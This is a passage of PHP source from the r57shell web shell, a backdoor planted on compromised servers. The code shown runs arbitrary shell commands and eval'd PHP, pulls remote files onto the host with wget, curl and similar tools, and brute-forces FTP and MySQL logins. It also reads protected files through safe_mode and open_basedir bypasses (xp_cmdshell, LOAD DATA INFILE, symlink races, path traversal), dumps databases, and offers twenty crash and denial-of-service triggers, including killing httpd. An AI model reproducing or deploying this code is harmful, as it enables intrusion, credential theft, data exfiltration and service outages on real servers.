@move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
4875
4876
or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
4877
4878
}
4879
4880
}
4881
4882
if (!empty($_POST['with']) &&!empty($_POST['rem_file']) &&!empty($_POST['loc_file']))
4883
4884
{
4885
4886
switch($_POST['with'])
4887
4888
{
4889
4890
case 'fopen':
4891
4892
$datafile = @implode("",@file($_POST['rem_file']));
4893
4894
if($datafile)
4895
4896
{
4897
4898
$w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
4899
4900
if($w_file)
4901
4902
{
4903
4904
@fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
4905
4906
@fclose($w_file);
4907
4908
}
4909
4910
}
4911
4912
$_POST['cmd'] = '';
4913
4914
break;
4915
4916
case 'wget':
4917
4918
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
4919
4920
break;
4921
4922
case 'fetch':
4923
4924
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
4925
4926
break;
4927
4928
case 'lynx':
4929
4930
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4931
4932
break;
4933
4934
case 'links':
4935
4936
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4937
4938
break;
4939
4940
case 'GET':
4941
4942
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4943
4944
break;
4945
4946
case 'curl':
4947
4948
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
4949
4950
break;
4951
4952
}
4953
4954
}
4955
4956
if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_file_up") ||($_POST['cmd']=="ftp_file_down")))
4957
4958
{
4959
4960
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
4961
4962
if(empty($ftp_port)) {$ftp_port = 21;}
4963
4964
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
4965
4966
if(!$connection) {err(3);}
4967
4968
else 
4969
4970
{
4971
4972
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) {err(4);}
4973
4974
else 
4975
4976
{
4977
4978
if($_POST['cmd']=="ftp_file_down") {if(chop($_POST['loc_file'])==$dir) {$_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']);}@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
4979
4980
if($_POST['cmd']=="ftp_file_up")   {@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
4981
4982
}
4983
4984
}
4985
4986
@ftp_close($connection);
4987
4988
$_POST['cmd'] = "";
4989
4990
}
4991
4992
if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_brute") ||($_POST['cmd']=="db_brute")))
4993
4994
{
4995
4996
if($_POST['cmd']=="ftp_brute"){
4997
4998
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
4999
5000
if(empty($ftp_port)) {$ftp_port = 21;}
5001
5002
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
5003
5004
}else if($_POST['cmd']=="db_brute"){
5005
5006
$connection = 1;
5007
5008
}
5009
5010
if(!$connection) {err(3);$_POST['cmd'] = "";}
5011
5012
else if(($_POST['brute_method']=='passwd') &&(!$users=get_users('/etc/passwd'))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>";$_POST['cmd'] = "";}
5013
5014
else if(($_POST['brute_method']=='dic') &&(!$users=get_users($_POST['dictionary']))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>";$_POST['cmd'] = "";}
5015
5016
if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
5017
5018
}
5019
5020
echo $table_up3;
5021
5022
if (empty($_POST['cmd']) &&!$safe_mode &&!$open_basedir) {$_POST['cmd']=(!$unix)?("dir"):("ls -lia");}
5023
5024
else if(empty($_POST['cmd']) &&($safe_mode ||$open_basedir)){$_POST['cmd']="safe_dir";}
5025
5026
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
5027
5028
if($safe_mode ||$open_basedir)
5029
5030
{
5031
5032
switch($_POST['cmd'])
5033
5034
{
5035
5036
case 'safe_dir':
5037
5038
$d=@dir($dir);
5039
5040
if ($d)
5041
5042
{
5043
5044
while (false!==($file=$d->read()))
5045
5046
{
5047
5048
if ($file=="."||$file=="..") continue;
5049
5050
@clearstatcache();
5051
5052
@list ($dev,$inode,$inodep,$nlink,$uid,$gid,$inodev,$size,$atime,$mtime,$ctime,$bsize) = stat($file);
5053
5054
if(!$unix){
5055
5056
echo date("d.m.Y H:i",$mtime);
5057
5058
if(@is_dir($file)) echo "  <DIR> ";else printf("% 7s ",$size);
5059
5060
}
5061
5062
else{
5063
5064
if(@function_exists('posix_getpwuid')){
5065
5066
$owner = @posix_getpwuid($uid);
5067
5068
$grgid = @posix_getgrgid($gid);
5069
5070
}else{$owner['name']=$grgid['name']='';}
5071
5072
echo $inode." ";
5073
5074
echo perms(@fileperms($file));
5075
5076
@printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5077
5078
echo date("d.m.Y H:i ",$mtime);
5079
5080
}
5081
5082
echo "$file\n";
5083
5084
}
5085
5086
$d->close();
5087
5088
}
5089
5090
else if(@function_exists('glob'))
5091
5092
{
5093
5094
function eh($errno,$errstr,$errfile,$errline)
5095
5096
{
5097
5098
global $D,$c,$i;
5099
5100
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/",$errstr,$o);
5101
5102
if($o){$D[$c] = $o[2];$c++;}
5103
5104
}
5105
5106
$error_reporting = @ini_get('error_reporting');
5107
5108
error_reporting(E_WARNING);
5109
5110
@ini_set("display_errors",1);
5111
5112
$root = "/";
5113
5114
if($dir) $root = $dir;
5115
5116
$c = 0;$D = array();
5117
5118
@set_error_handler("eh");
5119
5120
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
5121
5122
for($i=0;$i <strlen($chars);$i++)
5123
5124
{
5125
5126
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}";
5127
5128
$prevD = $D[count($D)-1];
5129
5130
@glob($path."*");
5131
5132
if($D[count($D)-1] != $prevD)
5133
5134
{
5135
5136
for($j=0;$j <strlen($chars);$j++)
5137
5138
{
5139
5140
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}";
5141
5142
$prevD2 = $D[count($D)-1];
5143
5144
@glob($path."*");
5145
5146
if($D[count($D)-1] != $prevD2)
5147
5148
{
5149
5150
for($p=0;$p <strlen($chars);$p++)
5151
5152
{
5153
5154
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
5155
5156
$prevD3 = $D[count($D)-1];
5157
5158
@glob($path."*");
5159
5160
if($D[count($D)-1] != $prevD3)
5161
5162
{
5163
5164
for($r=0;$r <strlen($chars);$r++)
5165
5166
{
5167
5168
$path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
5169
5170
@glob($path."*");
5171
5172
}
5173
5174
}
5175
5176
}
5177
5178
}
5179
5180
}
5181
5182
}
5183
5184
}
5185
5186
$D = array_unique($D);
5187
5188
foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";
5189
5190
error_reporting($error_reporting);
5191
5192
}
5193
5194
else echo $lang[$language.'_text29'];
5195
5196
break;
5197
5198
case 'test1':
5199
5200
$ci = @curl_init("file://".$_POST['test1_file']);
5201
5202
$cf = @curl_exec($ci);
5203
5204
echo htmlspecialchars($cf);
5205
5206
break;
5207
5208
case 'test2':
5209
5210
@include($_POST['test2_file']);
5211
5212
break;
5213
5214
case 'test3':
5215
5216
if(empty($_POST['test3_port'])) {$_POST['test3_port'] = "3306";}
5217
5218
$db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
5219
5220
if($db)
5221
5222
{
5223
5224
if(@mysql_select_db($_POST['test3_md'],$db))
5225
5226
{
5227
5228
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5229
5230
@mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
5231
5232
@mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
5233
5234
$r = @mysql_query("SELECT * FROM temp_r57_table");
5235
5236
while(($r_sql = @mysql_fetch_array($r))) {echo @htmlspecialchars($r_sql[0])."\r\n";}
5237
5238
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5239
5240
}
5241
5242
else echo "[-] ERROR! Can't select database";
5243
5244
@mysql_close($db);
5245
5246
}
5247
5248
else echo "[-] ERROR! Can't connect to mysql server";
5249
5250
break;
5251
5252
case 'test4':
5253
5254
if(empty($_POST['test4_port'])) {$_POST['test4_port'] = "1433";}
5255
5256
$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
5257
5258
if($db)
5259
5260
{
5261
5262
if(@mssql_select_db($_POST['test4_md'],$db))
5263
5264
{
5265
5266
@mssql_query("drop table r57_temp_table",$db);
5267
5268
@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
5269
5270
@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
5271
5272
$res = mssql_query("select * from r57_temp_table",$db);
5273
5274
while(($row=@mssql_fetch_row($res)))
5275
5276
{
5277
5278
echo htmlspecialchars($row[0])."\r\n";
5279
5280
}
5281
5282
@mssql_query("drop table r57_temp_table",$db);
5283
5284
}
5285
5286
else echo "[-] ERROR! Can't select database";
5287
5288
@mssql_close($db);
5289
5290
}
5291
5292
else echo "[-] ERROR! Can't connect to MSSQL server";
5293
5294
break;
5295
5296
case 'test5':
5297
5298
$temp=tempnam($dir,"fname");
5299
5300
if (@file_exists($temp)) @unlink($temp);
5301
5302
$extra = "-C ".$_POST['test5_file']." -X $temp";
5303
5304
@mb_send_mail(NULL,NULL,NULL,NULL,$extra);
5305
5306
$str = moreread($temp);
5307
5308
echo htmlspecialchars($str);
5309
5310
@unlink($temp);
5311
5312
break;
5313
5314
case 'test6':
5315
5316
$stream = @imap_open('/etc/passwd',"","");
5317
5318
$dir_list = @imap_list($stream,trim($_POST['test6_file']),"*");
5319
5320
for ($i = 0;$i <count($dir_list);$i++) echo htmlspecialchars($dir_list[$i])."\r\n";
5321
5322
@imap_close($stream);
5323
5324
break;
5325
5326
case 'test7':
5327
5328
$stream = @imap_open($_POST['test7_file'],"","");
5329
5330
$str = @imap_body($stream,1);
5331
5332
echo htmlspecialchars($str);
5333
5334
@imap_close($stream);
5335
5336
break;
5337
5338
case 'test8':
5339
5340
$temp=@tempnam($_POST['test8_file2'],"copytemp");
5341
5342
$str = readzlib($_POST['test8_file1'],$temp);
5343
5344
echo htmlspecialchars($str);
5345
5346
@unlink($temp);
5347
5348
break;
5349
5350
case 'test9':
5351
5352
@ini_restore("safe_mode");
5353
5354
@ini_restore("open_basedir");
5355
5356
$str = moreread($_POST['test9_file']);
5357
5358
echo htmlspecialchars($str);
5359
5360
break;
5361
5362
case 'test10':
5363
5364
@ob_clean();
5365
5366
$error_reporting = @ini_get('error_reporting');
5367
5368
error_reporting(E_ALL ^E_NOTICE);
5369
5370
@ini_set("display_errors",1);
5371
5372
$str=fopen($_POST['test10_file'],"r");
5373
5374
while(!feof($str)){print htmlspecialchars(fgets($str));}
5375
5376
fclose($str);
5377
5378
error_reporting($error_reporting);
5379
5380
break;
5381
5382
case 'test11':
5383
5384
@ob_clean();
5385
5386
$temp = 'zip://'.$_POST['test11_file'];
5387
5388
$str = moreread($temp);
5389
5390
echo htmlspecialchars($str);
5391
5392
break;
5393
5394
case 'test12':
5395
5396
@ob_clean();
5397
5398
$temp = 'compress.bzip2://'.$_POST['test12_file'];
5399
5400
$str = moreread($temp);
5401
5402
echo htmlspecialchars($str);
5403
5404
break;
5405
5406
case 'test13':
5407
5408
@error_log($_POST['test13_file1'],3,"php://../../../../../../../../../../../".$_POST['test13_file2']);
5409
5410
echo $lang[$language.'_text61'];
5411
5412
break;
5413
5414
case 'test14':
5415
5416
@session_save_path($_POST['test14_file2']."\0;/tmp");
5417
5418
@session_start();
5419
5420
@$_SESSION[php]=$_POST['test14_file1'];
5421
5422
echo $lang[$language.'_text61'];
5423
5424
break;
5425
5426
case 'test15':
5427
5428
@readfile($_POST['test15_file1'],3,"php://../../../../../../../../../../../".$_POST['test15_file2']);
5429
5430
echo $lang[$language.'_text61'];
5431
5432
break;
5433
5434
case 'test16':
5435
5436
if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
5437
5438
break;
5439
5440
case 'test17_1':
5441
5442
@unlink('symlinkread');
5443
5444
@symlink('a/a/a/a/a/a/','dummy');
5445
5446
@symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'],'symlinkread');
5447
5448
@unlink('dummy');
5449
5450
while (1) 
5451
5452
{
5453
5454
@symlink('.','dummy');
5455
5456
@unlink('dummy');
5457
5458
}
5459
5460
break;
5461
5462
case 'test17_2':
5463
5464
$str='';
5465
5466
while (strlen($str) <3) {
5467
5468
$temp = 'symlinkread';
5469
5470
$str = moreread($temp);
5471
5472
if($str){@ob_clean();echo htmlspecialchars($str);}
5473
5474
}
5475
5476
break;
5477
5478
case 'test17_3':
5479
5480
$dir = $files = array();
5481
5482
if(@version_compare(@phpversion(),"5.0.0")>=0){
5483
5484
while (@count($dir) <3) {
5485
5486
$dir=@scandir('symlinkread');
5487
5488
if (@count($dir) >2) {@ob_clean();@print_r($dir);}
5489
5490
}
5491
5492
}
5493
5494
else {
5495
5496
while (@count($files) <3) {
5497
5498
$dh  = @opendir('symlinkread');
5499
5500
while (false !== ($filename = @readdir($dh))) {
5501
5502
$files[] = $filename;
5503
5504
}
5505
5506
if(@count($files) >2){@ob_clean();@print_r($files);}
5507
5508
}
5509
5510
}
5511
5512
break;
5513
5514
}
5515
5516
}
5517
5518
if((!$safe_mode) &&($_POST['cmd']!="php_eval") &&($_POST['cmd']!="mysql_dump") &&($_POST['cmd']!="db_query") &&($_POST['cmd']!="ftp_brute") &&($_POST['cmd']!="db_brute")){
5519
5520
$cmd_rep = ex($_POST['cmd']);
5521
5522
if(!$unix) {echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n";}
5523
5524
else {echo @htmlspecialchars($cmd_rep)."\n";}}
5525
5526
switch($_POST['cmd'])
5527
5528
{
5529
5530
case 'dos1':
5531
5532
function a() {a();}a();
5533
5534
break;
5535
5536
case 'dos2':
5537
5538
@pack("d4294967297",2);
5539
5540
break;
5541
5542
case 'dos3':
5543
5544
$a = "a";@unserialize(@str_replace('1',2147483647,@serialize($a)));
5545
5546
break;
5547
5548
case 'dos4':
5549
5550
$t = array(1);while (1) {$a[] = &$t;};
5551
5552
break;
5553
5554
case 'dos5':
5555
5556
@dl("sqlite.so");$db = new SqliteDatabase("foo");
5557
5558
break;
5559
5560
case 'dos6':
5561
5562
preg_match('/(.(?!b))*/',@str_repeat("a",10000));
5563
5564
break;
5565
5566
case 'dos7':
5567
5568
@str_replace("A",str_repeat("B",65535),str_repeat("A",65538));
5569
5570
break;
5571
5572
case 'dos8':
5573
5574
@shell_exec("killall -11 httpd");
5575
5576
break;
5577
5578
case 'dos9':
5579
5580
function cx(){@tempnam("/www/","../../../../../../var/tmp/cx");cx();}cx();
5581
5582
break;
5583
5584
case 'dos10':
5585
5586
$a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
5587
5588
break;
5589
5590
case 'dos11':
5591
5592
@array_fill(1,123456789,"Infigo-IS");
5593
5594
break;
5595
5596
case 'dos12':
5597
5598
@substr_compare("A","A",12345678);
5599
5600
break;
5601
5602
case 'dos13':
5603
5604
@unserialize("a:2147483649:{");
5605
5606
break;
5607
5608
case 'dos14':
5609
5610
$Data = @str_ireplace("\n","<br>",$Data);
5611
5612
break;
5613
5614
case 'dos15':
5615
5616
function toUTF($x) {return chr(($x >>6) +192) .chr(($x &63) +128);}
5617
5618
$str1 = "";for($i=0;$i <64;$i++){$str1 .= toUTF(977);}
5619
5620
@htmlentities($str1,ENT_NOQUOTES,"UTF-8");
5621
5622
break;
5623
5624
case 'dos16':
5625
5626
$r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r,$e);
5627
5628
for ($i=0;$i<1000;$i++) $arr[$i]=array(array(""));
5629
5630
unset($arr[600]);@zip_entry_read($e,-1);unset($arr[601]);
5631
5632
break;
5633
5634
case 'dos17':
5635
5636
$z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
5637
5638
$y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
5639
5640
$x = "AQ                                                                        ";
5641
5642
unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
5643
5644
break;
5645
5646
case 'dos18':
5647
5648
$MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY,0600);
5649
5650
if (!@msg_send ($msg_id,1,'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH',false,true,$msg_err)) 
5651
5652
echo "Msg not sent because $msg_err\n";
5653
5654
if (@msg_receive ($msg_id,1,$msg_type,0xffffffff,$_SESSION,false,0,$msg_error)) {
5655
5656
echo "$msg\n";
5657
5658
}else {echo "Received $msg_error fetching message\n";break;}
5659
5660
@msg_remove_queue ($msg_id);
5661
5662
break;
5663
5664
case 'dos19':
5665
5666
$url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";@fopen($url,"r");
5667
5668
break;
5669
5670
case 'dos20':
5671
5672
$hashtable = str_repeat("A",39);
5673
5674
$hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
5675
5676
$hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
5677
5678
$str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
5679
5680
for ($i=0;$i<65535;$i++) {$str .= 'i:0;R:2;';}
5681
5682
$str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
5683
5684
@unserialize($str);
5685
5686
break;
5687
5688
}
5689
5690
if ($_POST['cmd']=="php_eval"){
5691
5692
$eval = @str_replace("<?","",$_POST['php_eval']);
5693
5694
$eval = @str_replace("?>","",$eval);
5695
5696
@eval($eval);}
5697
5698
if ($_POST['cmd']=="ftp_brute")
5699
5700
{
5701
5702
$suc = 0;
5703
5704
if($_POST['brute_method']=='passwd'){
5705
5706
foreach($users as $user)
5707
5708
{
5709
5710
$connection = @ftp_connect($ftp_server,$ftp_port,10);
5711
5712
if(@ftp_login($connection,$user,$user)) {echo "[+] $user:$user - success\r\n";$suc++;}
5713
5714
else if(isset($_POST['reverse'])) {if(@ftp_login($connection,$user,strrev($user))) {echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}}
5715
5716
@ftp_close($connection);
5717
5718
}
5719
5720
}else if(($_POST['brute_method']=='dic') &&isset($_POST['ftp_login'])){
5721
5722
foreach($users as $user)
5723
5724
{
5725
5726
$connection = @ftp_connect($ftp_server,$ftp_port,10);
5727
5728
if(@ftp_login($connection,$_POST['ftp_login'],$user)) {echo "[+] ".$_POST['ftp_login'].":$user - success\r\n";$suc++;}
5729
5730
@ftp_close($connection);
5731
5732
}
5733
5734
}
5735
5736
echo "\r\n-------------------------------------\r\n";
5737
5738
$count = count($users);
5739
5740
if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;}
5741
5742
echo $lang[$language.'_text97'].$count."\r\n";
5743
5744
echo $lang[$language.'_text98'].$suc."\r\n";
5745
5746
}
5747
5748
if ($_POST['cmd']=="db_brute")
5749
5750
{
5751
5752
$suc = 0;
5753
5754
if($_POST['brute_method']=='passwd'){
5755
5756
foreach($users as $user)
5757
5758
{
5759
5760
$sql = new my_sql();
5761
5762
$sql->db   = $_POST['db'];
5763
5764
$sql->host = $_POST['db_server'];
5765
5766
$sql->port = $_POST['db_port'];
5767
5768
$sql->user = $user;
5769
5770
$sql->pass = $user;
5771
5772
if($sql->connect()) {echo "[+] $user:$user - success\r\n";$suc++;}
5773
5774
}
5775
5776
if(isset($_POST['reverse']))
5777
5778
{
5779
5780
foreach($users as $user)
5781
5782
{
5783
5784
$sql = new my_sql();
5785
5786
$sql->db   = $_POST['db'];
5787
5788
$sql->host = $_POST['db_server'];
5789
5790
$sql->port = $_POST['db_port'];
5791
5792
$sql->user = $user;
5793
5794
$sql->pass = strrev($user);
5795
5796
if($sql->connect()) {echo "[+] $user:".strrev($user)." - success\r\n";$suc++;}
5797
5798
}
5799
5800
}
5801
5802
}else if(($_POST['brute_method']=='dic') &&isset($_POST['mysql_l'])){
5803
5804
foreach($users as $user)
5805
5806
{
5807
5808
$sql = new my_sql();
5809
5810
$sql->db   = $_POST['db'];
5811
5812
$sql->host = $_POST['db_server'];
5813
5814
$sql->port = $_POST['db_port'];
5815
5816
$sql->user = $_POST['mysql_l'];
5817
5818
$sql->pass = $user;
5819
5820
if($sql->connect()) {echo "[+] ".$_POST['mysql_l'].":$user - success\r\n";$suc++;}
5821
5822
}
5823
5824
}
5825
5826
echo "\r\n-------------------------------------\r\n";
5827
5828
$count = count($users);
5829
5830
if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;}
5831
5832
echo $lang[$language.'_text97'].$count."\r\n";
5833
5834
echo $lang[$language.'_text98'].$suc."\r\n";
5835
5836
}
5837
5838
if ($_POST['cmd']=="mysql_dump")
5839
5840
{
5841
5842
if(isset($_POST['dif'])) {$fp = @fopen($_POST['dif_name'],"w");}
5843
5844
$sql = new my_sql();
5845
5846
$sql->db   = $_POST['db'];
5847
5848
$sql->host = $_POST['db_server'];
5849
5850
$sql->port = $_POST['db_port'];
5851
5852
$sql->user = $_POST['mysql_l'];
5853
5854
$sql->pass = $_POST['mysql_p'];
5855
5856
$sql->base = $_POST['mysql_db'];
5857
5858
if(!$sql->connect()) {echo "[-] ERROR! Can't connect to SQL server";}
5859
5860
else if(!$sql->select_db()) {echo "[-] ERROR! Can't select database";}
5861
5862
else if(!$sql->dump($_POST['mysql_tbl'])) {echo "[-] ERROR! Can't create dump";}
5863
5864
else {
5865
5866
if(empty($_POST['dif'])) {foreach($sql->dump as $v) echo $v."\r\n";}
5867
5868
else if($fp ||@function_exists('file_put_contents')){foreach($sql->dump as $v){@fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");}}
5869
5870
else {echo "[-] ERROR! Can't write in dump file";}
5871
5872
}
5873
5874
}
5875
5876
echo "</textarea></div>";
5877
5878
echo "</b>";
5879
5880
echo "</td></tr></table>";
5881
5882
echo "<table width=100% cellpadding=0 cellspacing=0>";
5883
5884
function div_title($title,$id)
5885
5886
{
5887
5888
return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
5889
5890
}
5891
5892
function div($id)
5893
5894
{
5895
5896
if(isset($_COOKIE[$id]) &&($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
5897
5898
$divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
5899
5900
if(empty($_COOKIE[$id]) &&@in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
5901
5902
return '<div id="'.$id.'">';
5903
5904
}
5905
5906
if(!$safe_mode){
5907
5908
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
5909
5910
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
5911
5912
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
5913
5914
echo $te.'</div>'.$table_end1.$fe;
5915
5916
}
5917
5918
else{
5919
5920
echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
5921
5922
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
5923
5924
echo $te.'</div>'.$table_end1.$fe;
5925
5926
}
5927
5928
echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
5929
5930
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
5931
5932
echo $te.'</div>'.$table_end1.$fe;
5933
5934
if($safe_mode ||$open_basedir){
5935
5936
echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
5937
5938
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
5939
5940
echo $te.'</div>'.$table_end1.$fe;
5941
5942
}
5943
5944
if($unix &&@function_exists('touch')){
5945
5946
echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
5947
5948
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php")))
5949
5950
.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
5951
5952
.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
5953
5954
echo sr(15,"<b> or set  Day".$arrow."</b>",
5955
5956
'
5957
5958
<select name="day" size="1">
5959
5960
<option value="01">1</option>
5961
5962
<option value="02">2</option>
5963
5964
<option value="03">3</option>
5965
5966
<option value="04">4</option>
5967
5968
<option value="05">5</option>
5969
5970
<option value="06">6</option>
5971
5972
<option value="07">7</option>
5973
5974
<option value="08">8</option>
5975
5976
<option value="09">9</option>
5977
5978
<option value="10">10</option>
5979
5980
<option value="11">11</option>
5981
5982
<option value="12">12</option>
5983
5984
<option value="13">13</option>
5985
5986
<option value="14">14</option>
5987
5988
<option value="15">15</option>
5989
5990
<option value="16">16</option>
5991
5992
<option value="17">17</option>
5993
5994
<option value="18">18</option>
5995
5996
<option value="19">19</option>
5997
5998
<option value="20">20</option>
5999
6000
<option value="21">21</option>
6001
6002
<option value="22">22</option>
6003
6004
<option value="23">23</option>
6005
6006
<option value="24">24</option>
6007
6008
<option value="25">25</option>
6009
6010
<option value="26">26</option>
6011
6012
<option value="27">27</option>
6013
6014
<option value="28">28</option>
6015
6016
<option value="29">29</option>
6017
6018
<option value="30">30</option>
6019
6020
<option value="31">31</option>
6021
6022
</select>'
6023
6024
.ws(4)."<b>Month".$arrow."</b>"
6025
6026
.'
6027
6028
<select name="month" size="1">
6029
6030
<option value="January">January</option>
6031
6032
<option value="February">February</option>
6033
6034
<option value="March">March</option>
6035
6036
<option value="April">April</option>
6037
6038
<option value="May">May</option>
6039
6040
<option value="June">June</option>
6041
6042
<option value="July">July</option>
6043
6044
<option value="August">August</option>
6045
6046
<option value="September">September</option>
6047
6048
<option value="October">October</option>
6049
6050
<option value="November">November</option>
6051
6052
<option value="December">December</option>
6053
6054
</select>'
6055
6056
.ws(4)."<b>Year".$arrow."</b>"
6057
6058
.'
6059
6060
<select name="year" size="1">
6061
6062
<option value="1998">1998</option>
6063
6064
<option value="1999">1999</option>
6065
6066
<option value="2000">2000</option>
6067
6068
<option value="2001">2001</option>
6069
6070
<option value="2002">2002</option>
6071
6072
<option value="2003">2003</option>
6073
6074
<option value="2004">2004</option>
6075
6076
<option value="2005">2005</option>
6077
6078
<option value="2006">2006</option>
6079
6080
